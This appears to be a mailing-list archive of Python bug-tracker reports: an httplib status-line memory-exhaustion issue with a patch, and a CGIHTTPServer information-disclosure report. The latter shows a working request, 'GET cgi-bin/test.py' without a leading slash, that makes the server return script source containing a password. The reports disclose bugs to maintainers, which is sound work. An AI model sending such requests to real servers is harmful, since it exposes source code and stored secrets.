[issue6791] httplib read status memory usage

2009-08-28 Thread sumar 

New submission from sumar m.sucaj...@gmail.com:

During writing some code I discovered some behaviour of httplib. When we
connect to host, which doesn’t respond with status line, but it just
sending data, httplib may consume more and more memory, becouce when we
execute
h = httplib.HTTPConnection(‘host’)
h.conect()
h.request(‘GET’, ‘/’)
r = h.getresponse()
httplib tries to read one line from host. If host doesn’t send new line
character (‘\n’), httplib reads more and more data. On my tests httplib
could consume all of 4GB of memory and the python process was killed by
oom_killer.
The resolution is to limit maximum amount of data read on getting
response. I have performed some test:
I received 3438293 from hosts located in the network. The longest valid
response line is
HTTP/1.1 500 ( The specified Secure Sockets Layer (SSL) port is not
allowed. ISA Server is not configured to allow SSL requests from this
port. Most Web browsers use port 443 for SSL requests.  )\r\n
and it has 197 characters.
In RFC2616 in section 6.1 we have:
“The first line of a Response message is the Status-Line, consisting of
the protocol version followed by a numeric status code and its
associated textual phrase, with each element separated by SP characters.
No CR or LF is allowed except in the final CRLF sequence.
   Status-Line = HTTP-Version SP Status-Code SP Reason-Phrase CRLF
(..)The Reason-Phrase is intended to give a short textual description of
the Status-Code.”
So limiting maximum status line length to 256 characters is a solution
of this problem. It doesn’t break compatibility withc RFC 2616.

My patch was written originally on python2.4, but I’ve tested it on
python2.6:
[...@host python2.6]$ patch --dry-run -i /home/ms/httplib.patch
patching file httplib.py
Hunk #1 succeeded at 209 (offset 54 lines).

--
components: Library (Lib)
files: httplib.patch
keywords: patch
messages: 92027
nosy: m.sucajtys
severity: normal
status: open
title: httplib read status memory usage
type: resource usage
versions: Python 2.4, Python 2.5, Python 2.6
Added file: http://bugs.python.org/file14795/httplib.patch

___
Python tracker rep...@bugs.python.org
http://bugs.python.org/issue6791
___
___
Python-bugs-list mailing list
Unsubscribe: 
http://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com

[issue6791] httplib read status memory usage

2009-08-28 Thread sumar 

sumar m.sucaj...@gmail.com added the comment:

I've also check patch against code in svn tree:
wget http://svn.python.org/projects/python/trunk/Lib/httplib.py
patch -p0 -i httplib.patch --dry-run
patching file httplib.py
Hunk #1 succeeded at 209 (offset 54 lines).
Hunk #2 succeeded at 303 (offset 10 lines).

--

___
Python tracker rep...@bugs.python.org
http://bugs.python.org/issue6791
___
___
Python-bugs-list mailing list
Unsubscribe: 
http://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com

[issue2254] Python CGIHTTPServer information disclosure

2008-03-07 Thread sumar 

New submission from sumar:


Summary:

An information disclosure flaw exists in standard python CGIHTTPServer
module. 
Bug is confirmed in python 2.5 @ fedora 7 (python-2.5-15.fc7).


Description:

Requesting cgi script (in example test.py) without / in the beginnig of URL 
cause return script content/code instead of script execution.
It could lead to disclose some secret information eg. password.


Exploit code:

Connected to localhost.
Escape character is '^]'.
GET cgi-bin/test.py HTTP/1.0

HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/2.5
Date: Fri, 07 Mar 2008 14:55:30 GMT
Content-type: text/plain
Content-Length: 150
Last-Modified: Fri, 07 Mar 2008 14:55:04 GMT

#!/usr/bin/env python

print 'Content-Type: text/html'
print 'Cache-Control: no-cache'
print
print 'Hello'
passwd='secret'
path=/opt/myapp/secretpath
Connection closed by foreign host.


correct request:

Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /cgi-bin/test.py HTTP/1.0

HTTP/1.0 200 Script output follows
Server: SimpleHTTP/0.6 Python/2.5
Date: Fri, 07 Mar 2008 15:01:03 GMT
Content-Type: text/html
Cache-Control: no-cache

Hello
Connection closed by foreign host.



--
components: Library (Lib)
messages: 63361
nosy: m.sucajtys
severity: normal
status: open
title: Python CGIHTTPServer information disclosure
type: security
versions: Python 2.5

__
Tracker [EMAIL PROTECTED]
http://bugs.python.org/issue2254
__
___
Python-bugs-list mailing list 
Unsubscribe: 
http://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com